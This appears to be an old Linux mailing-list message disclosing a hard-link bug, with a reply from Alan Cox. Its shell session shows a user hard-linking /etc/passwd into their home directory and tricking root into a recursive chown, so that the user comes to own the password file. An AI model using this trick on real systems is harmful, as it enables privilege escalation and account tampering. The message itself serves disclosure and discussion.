user$ ln /etc/passwd ~/.some
user$ mail root -s "Please, help me"
change pls my uid (and mount with this uid some nfs export from other
machine)
.
...
root# chown newuser /home/user -R
...
user$ ls -l /etc/passwd
-rw-r--r-- 1 newuser root 1053 Dec 22 20:13 /etc/passwd
user$ he-he-he
This is only common example. And this is a *serious* security bug.
On Mon, 29 Dec 1997, Alan Cox wrote:
> > >in the root partition (presumably /tmp would be a symlink to /var/tmp)
> > >would also help. I didn't see how your security hole worked until I
> > >stopped trying to think *why* root would do what you say he'd do.
> >
> > Unfortunately, but files in not only root directory maybe "hacked" by users.
> > For example, there is foreign user files. It's maybe very important. And as
>
> If chown -R doesnt do what you want, then fix the chown command to have a flag
> for "dont chown hard linked files". Its not a kernel issue, its either a
> user error issue and/or a "tool does the wrong thing" issue depending on your
> viewpoint
>